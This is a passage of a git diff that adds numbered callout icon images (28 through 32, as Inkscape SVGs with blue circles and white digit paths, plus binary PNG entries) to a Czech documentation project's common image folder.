+++ b/tmp/cs-CZ/xml/Common_Content/images/28.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.48741,9.7149811 c 0.503575,1.23e-5 0.979486,0.060885 1.427734,0.1826172 0.448236,0.1217567 0.841139,0.3043737 1.178711,0.5478517 0.337557,0.243501 0.605949,0.547862 0.805176,0.913086 0.19921,0.365244 0.298819,0.794118 0.298828,1.286621 -9e-6,0.365243 -0.05535,0.697274 -0.166016,0.996094 -0.110685,0.293302 -0.262866,0.561694 -0.456543,0.805175 -0.193692,0.237963 -0.423347,0.451017 -0.688965,0.639161 -0.265631,0.188157 -0.553392,0.359707 -0.863281,0.514648 0.320957,0.171556 0.63362,0.362473 0.937988,0.572754 0.309889,0.210292 0.583814,0.448247 0.821778,0.713867 0.237947,0.260096 0.428865,0.55339 0.572754,0.879883 0.143871,0.326501 0.215811,0.691735 0.21582,1.095703 -9e-6,0.503583 -0.09962,0.960126 -0.298828,1.369629 -0.199227,0.409506 -0.478687,0.758139 -0.838379,1.045898 -0.359708,0.287761 -0.791348,0.509115 -1.294922,0.664063 -0.498053,0.154948 -1.048671,0.232422 -1.651855,0.232422 -0.652999,0 -1.234053,-0.07471 -1.743164,-0.224121 -0.509117,-0.149414 -0.937991,-0.362467 -1.286622,-0.639161 -0.348634,-0.276691 -0.614258,-0.617023 -0.796875,-1.020996 -0.177084,-0.403969 -0.265625,-0.857744 -0.265625,-1.361328 0,-0.415035 0.06087,-0.78857 0.182618,-1.120605 0.121744,-0.332027 0.287759,-0.630855 0.498046,-0.896485 0.210285,-0.265619 0.456542,-0.500808 0.73877,-0.705566 0.282224,-0.204747 0.583819,-0.384597 0.904785,-0.539551 -0.271161,-0.171543 -0.525718,-0.356927 -0.763672,-0.556152 -0.237957,-0.204746 -0.445477,-0.428866 -0.622558,-0.672363 -0.171551,-0.249016 -0.309897,-0.522942 -0.415039,-0.821778 -0.09961,-0.298819 -0.149415,-0.628083 -0.149414,-0.987793 -1e-6,-0.481435 0.09961,-0.902008 0.298828,-1.261718 0.204751,-0.365224 0.478676,-0.669585 0.821777,-0.913086 0.343097,-0.249012 0.738767,-0.434396 1.187012,-0.5561527 0.448238,-0.1217326 0.918615,-0.1826049 1.411133,-0.1826172 m -1.718262,9.0644529 c -3e-6,0.221357 0.03597,0.42611 0.10791,0.614258 0.07194,0.18262 0.17708,0.340334 0.31543,0.473145 0.143876,0.132814 0.32096,0.237957 0.53125,0.315429 0.210282,0.07194 0.453771,0.107912 0.730468,0.10791 0.58105,2e-6 1.015457,-0.135577 1.303223,-0.406738 0.287754,-0.27669 0.431634,-0.639157 0.431641,-1.087402 -7e-6,-0.232419 -0.04981,-0.439938 -0.149414,-0.622559 -0.09408,-0.188147 -0.218594,-0.359696 -0.373535,-0.514648 -0.14942,-0.160478 -0.32097,-0.307125 -0.514649,-0.439942 -0.19369,-0.132807 -0.387375,-0.260086 -0.581055,-0.381836 L 20.3878,16.72084 c -0.243494,0.12175 -0.464848,0.254563 -0.664062,0.398438 -0.199223,0.138351 -0.370772,0.293299 -0.514649,0.464844 -0.138349,0.16602 -0.246259,0.348637 -0.32373,0.547851 -0.07748,0.199223 -0.116214,0.415043 -0.116211,0.647461 m 1.70166,-7.188476 c -0.182622,10e-6 -0.354171,0.02768 -0.514648,0.08301 -0.154952,0.05535 -0.290532,0.13559 -0.406739,0.240723 -0.11068,0.105153 -0.199222,0.235199 -0.265625,0.390137 -0.06641,0.154957 -0.09961,0.329274 -0.09961,0.522949 -3e-6,0.232431 0.0332,0.434416 0.09961,0.605957 0.07194,0.166024 0.166012,0.315438 0.282227,0.448242 0.121741,0.127287 0.260087,0.243498 0.415039,0.348633 0.160477,0.09962 0.32926,0.199226 0.506348,0.298828 0.171544,-0.08853 0.334793,-0.185376 0.489746,-0.290527 0.154942,-0.105135 0.290522,-0.224113 0.406738,-0.356934 0.121739,-0.138338 0.218581,-0.293286 0.290527,-0.464843 0.07193,-0.171541 0.107904,-0.367993 0.10791,-0.589356 -6e-6,-0.193675 -0.03321,-0.367992 -0.09961,-0.522949 -0.06641,-0.154938 -0.15772,-0.284984 -0.273926,-0.390137 -0.116216,-0.105133 -0.254562,-0.185374 -0.415039,-0.240723 -0.160487,-0.05533 -0.334803,-0.083 -0.522949,-0.08301"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/29.png b/tmp/cs-CZ/xml/Common_Content/images/29.png
new file mode 100644
index 000000000..9a3141ec4
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/29.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/29.svg b/tmp/cs-CZ/xml/Common_Content/images/29.svg
new file mode 100644
index 000000000..04b5c5034
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/29.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.554792,15.052383 c -8e-6,0.581061 -0.03321,1.162116 -0.09961,1.743164 -0.06088,0.575526 -0.174325,1.126144 -0.340332,1.651856 -0.16049,0.525719 -0.381844,1.018232 -0.664063,1.477539 -0.2767,0.453778 -0.630866,0.846681 -1.0625,1.178711 -0.426112,0.332032 -0.94076,0.59489 -1.543945,0.788574 -0.597661,0.188151 -1.300459,0.282227 -2.108398,0.282227 -0.116214,0 -0.243493,-0.0028 -0.381836,-0.0083 -0.138349,-0.0055 -0.279462,-0.01384 -0.42334,-0.0249 -0.138348,-0.0055 -0.273928,-0.0166 -0.406738,-0.0332 -0.132814,-0.01107 -0.249025,-0.02767 -0.348633,-0.0498 l 0,-2.058594 c 0.204751,0.05534 0.423338,0.09961 0.655762,0.132813 0.237953,0.02767 0.478675,0.04151 0.722168,0.0415 0.747066,2e-6 1.361324,-0.09131 1.842773,-0.273925 0.48144,-0.188149 0.863276,-0.44824 1.145508,-0.780274 0.28222,-0.337562 0.481439,-0.738766 0.597656,-1.203613 0.121738,-0.464839 0.196445,-0.97672 0.224121,-1.535645 l -0.10791,0 c -0.110683,0.199225 -0.243496,0.384609 -0.398438,0.556153 -0.154953,0.171554 -0.33757,0.320968 -0.547851,0.448242 -0.210292,0.127283 -0.448247,0.226892 -0.713867,0.298828 -0.26563,0.07194 -0.561691,0.107914 -0.888184,0.10791 -0.525719,4e-6 -0.998863,-0.08577 -1.419433,-0.257324 -0.420575,-0.171545 -0.777509,-0.420568 -1.070801,-0.74707 -0.287762,-0.326492 -0.509116,-0.727696 -0.664063,-1.203614 -0.154948,-0.475904 -0.232422,-1.020988 -0.232422,-1.635253 0,-0.65852 0.09131,-1.247875 0.273926,-1.768067 0.18815,-0.520172 0.453775,-0.960113 0.796875,-1.319824 0.343097,-0.365223 0.758136,-0.644682 1.245117,-0.838379 0.49251,-0.1936727 1.043128,-0.2905151 1.651856,-0.2905274 0.597651,1.23e-5 1.15657,0.1079224 1.676758,0.3237304 0.520175,0.210298 0.971184,0.534028 1.353027,0.971192 0.381828,0.437185 0.683423,0.990569 0.904785,1.660156 0.221346,0.669605 0.332023,1.458178 0.332031,2.365722 m -4.216796,-3.262207 c -0.226893,1.1e-5 -0.434412,0.04151 -0.622559,0.124512 -0.188155,0.08302 -0.351403,0.213063 -0.489746,0.390137 -0.132816,0.171559 -0.237959,0.392913 -0.31543,0.664062 -0.07194,0.265634 -0.107913,0.581063 -0.10791,0.946289 -3e-6,0.586596 0.124509,1.05144 0.373535,1.394532 0.24902,0.343105 0.625322,0.514654 1.128906,0.514648 0.254553,6e-6 0.486975,-0.0498 0.697266,-0.149414 0.210281,-0.0996 0.390131,-0.229648 0.539551,-0.390137 0.149408,-0.160475 0.262852,-0.340325 0.340332,-0.53955 0.083,-0.199212 0.124505,-0.401197 0.124512,-0.605958 -7e-6,-0.282218 -0.03598,-0.561677 -0.107911,-0.838378 -0.06641,-0.282218 -0.171555,-0.534008 -0.315429,-0.755372 -0.138352,-0.226878 -0.312669,-0.409495 -0.52295,-0.547851 -0.204757,-0.138336 -0.44548,-0.207509 -0.722167,-0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/3.png b/tmp/cs-CZ/xml/Common_Content/images/3.png
new file mode 100644
index 000000000..a4754f061
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/3.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/3.svg b/tmp/cs-CZ/xml/Common_Content/images/3.svg
new file mode 100644
index 000000000..e2f17168d
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/3.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 19.422316,12.587051 c -9e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.23243,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315437,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503572,0.470382 0.755362,1.106775 0.755371,1.909179 -9e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.392911,0.332031 -0.890957,0.592122 -1.494141,0.780273 -0.597661,0.182617 -1.303227,0.273926 -2.116699,0.273926 -0.652998,0 -1.267255,-0.05534 -1.842773,-0.166016 -0.575523,-0.105143 -1.112306,-0.268392 -1.610352,-0.489746 l 0,-2.183105 c 0.249023,0.132815 0.511881,0.249025 0.788574,0.348632 0.276692,0.09961 0.553384,0.185387 0.830079,0.257325 0.27669,0.06641 0.547848,0.116212 0.813476,0.149414 0.271156,0.0332 0.525713,0.04981 0.763672,0.0498 0.475907,2e-6 0.871577,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567214,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320957,-0.351397 0.398437,-0.572754 0.083,-0.226885 0.124506,-0.473141 0.124512,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.265631,-0.376297 -0.498047,-0.514648 -0.226893,-0.143876 -0.525721,-0.254553 -0.896484,-0.332032 -0.370773,-0.07747 -0.827315,-0.116205 -1.369629,-0.116211 l -0.863281,0 0,-1.801269 0.846679,0 c 0.509111,7e-6 0.932451,-0.04426 1.27002,-0.132813 0.33756,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.43164,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124512,-0.672363 -6e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.68897,-0.365224 -1.27002,-0.365234 -0.265629,10e-6 -0.514652,0.02768 -0.74707,0.08301 -0.226891,0.04981 -0.439944,0.116221 -0.63916,0.199218 -0.193688,0.07748 -0.373538,0.166026 -0.539551,0.265625 -0.160484,0.09409 -0.307131,0.188161 -0.439941,0.282227 l -1.294922,-1.709961 c 0.232421,-0.171538 0.484211,-0.329253 0.755371,-0.473145 0.276691,-0.143868 0.575519,-0.26838 0.896484,-0.373535 0.320961,-0.1106647 0.666827,-0.1964393 1.037598,-0.2573239 0.370765,-0.06086 0.766435,-0.091296 1.187012,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492506,0.1272911 0.913079,0.3154421 1.261718,0.5644531 0.348626,0.243501 0.617017,0.545096 0.805176,0.904786 0.193677,0.354177 0.290519,0.760914 0.290528,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/30.png b/tmp/cs-CZ/xml/Common_Content/images/30.png
new file mode 100644
index 000000000..9d3db242d
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/30.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/30.svg b/tmp/cs-CZ/xml/Common_Content/images/30.svg
new file mode 100644
index 000000000..5cdcf65e8
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/30.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.6378,15.940567 c -9e-6,0.979497 -0.07748,1.853845 -0.232422,2.623047 -0.149422,0.769208 -0.392912,1.422202 -0.730468,1.958984 -0.332039,0.536785 -0.763679,0.94629 -1.294922,1.228516 -0.525722,0.282226 -1.162115,0.42334 -1.90918,0.42334 -0.702803,0 -1.314294,-0.141114 -1.834473,-0.42334 -0.520184,-0.282226 -0.951824,-0.691731 -1.294922,-1.228516 -0.3431,-0.536782 -0.600424,-1.189776 -0.771972,-1.958984 -0.166016,-0.769202 -0.249024,-1.64355 -0.249024,-2.623047 0,-0.979485 0.07471,-1.8566 0.224121,-2.631348 0.154948,-0.77473 0.398437,-1.430491 0.730469,-1.967285 0.33203,-0.536772 0.760903,-0.946277 1.286621,-1.228515 0.525713,-0.2877487 1.162106,-0.4316287 1.90918,-0.431641 0.69726,1.23e-5 1.305984,0.1411254 1.826172,0.42334 0.520175,0.282238 0.954582,0.691743 1.303223,1.228515 0.348624,0.536794 0.608715,1.192555 0.780273,1.967286 0.171541,0.774747 0.257315,1.654629 0.257324,2.639648 m -5.760742,0 c -3e-6,1.383468 0.118975,2.423832 0.356934,3.121094 0.237952,0.697268 0.650223,1.0459 1.236816,1.045898 0.575516,2e-6 0.987787,-0.345863 1.236816,-1.037597 0.254552,-0.691729 0.38183,-1.734859 0.381836,-3.129395 -6e-6,-1.38899 -0.127284,-2.43212 -0.381836,-3.129395 -0.249029,-0.702789 -0.6613,-1.054188 -1.236816,-1.054199 -0.293299,1.1e-5 -0.542322,0.08855 -0.74707,0.265625 -0.199223,0.177093 -0.362471,0.439951 -0.489746,0.788574 -0.127282,0.348642 -0.218591,0.785816 -0.273926,1.311524 -0.05534,0.52019 -0.08301,1.126146 -0.08301,1.817871"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/31.png b/tmp/cs-CZ/xml/Common_Content/images/31.png
new file mode 100644
index 000000000..9e2675da5
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/31.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/31.svg b/tmp/cs-CZ/xml/Common_Content/images/31.svg
new file mode 100644
index 000000000..f0fdb294d
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/31.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 22.579206,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141117,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168786,0.157724 -0.257324,0.240723 -0.08855,0.08302 -0.17432,0.157723 -0.257325,0.224121 l -1.394531,1.120605 -1.245117,-1.543945 3.909668,-3.1127931 2.108398,0 0,12.1357421"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/32.png b/tmp/cs-CZ/xml/Common_Content/images/32.png
new file mode 100644
index 000000000..20f1bb23c
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/32.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/32.svg b/tmp/cs-CZ/xml/Common_Content/images/32.svg
new file mode 100644
index 000000000..938292810
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/32.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
